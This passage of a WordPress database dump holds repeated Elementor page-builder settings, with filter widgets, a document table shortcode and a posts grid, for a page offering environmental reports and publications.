options\",\"apply_indexer\":\"yes\",\"show_counter\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26330,3855,'_elementor_pro_version','3.3.6'),(26340,3857,'_elementor_edit_mode','builder'),(26341,3857,'_elementor_template_type','wp-page'),(26342,3857,'_elementor_version','3.4.0'),(26343,3857,'_wp_page_template','default'),(26344,3857,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f128edd\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"apply_indexer\":\"yes\",\"show_counter\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26346,3857,'_elementor_pro_version','3.3.6'),(26347,3858,'_elementor_edit_mode','builder'),(26348,3858,'_elementor_template_type','wp-page'),(26349,3858,'_elementor_version','3.4.0'),(26350,3858,'_wp_page_template','default'),(26351,3858,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f128edd\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"apply_indexer\":\"yes\",\"show_counter\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26353,3858,'_elementor_pro_version','3.3.6'),(26354,3859,'_elementor_edit_mode','builder'),(26355,3859,'_elementor_template_type','wp-page'),(26356,3859,'_elementor_version','3.4.0'),(26357,3859,'_wp_page_template','default'),(26358,3859,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f128edd\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"apply_indexer\":\"yes\",\"show_counter\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26360,3859,'_elementor_pro_version','3.3.6'),(26370,3861,'_elementor_edit_mode','builder'),(26371,3861,'_elementor_template_type','wp-page'),(26372,3861,'_elementor_version','3.4.0'),(26373,3861,'_wp_page_template','default'),(26374,3861,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f128edd\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"apply_indexer\":\"yes\",\"show_counter\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26376,3861,'_elementor_pro_version','3.3.6'),(26377,3862,'_elementor_edit_mode','builder'),(26378,3862,'_elementor_template_type','wp-page'),(26379,3862,'_elementor_version','3.4.0'),(26380,3862,'_wp_page_template','default'),(26381,3862,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f128edd\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"apply_indexer\":\"yes\",\"show_counter\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26383,3862,'_elementor_pro_version','3.3.6'),(26384,3863,'_elementor_edit_mode','builder'),(26385,3863,'_elementor_template_type','wp-page'),(26386,3863,'_elementor_version','3.4.0'),(26387,3863,'_wp_page_template','default'),(26388,3863,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[{\"id\":\"51185e0\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"3846\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"apply_button_text\":\"\",\"apply_button_icon\":\"fa fa-search\",\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"},{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\",\"filter_id\":[\"3847\"]},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f128edd\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some 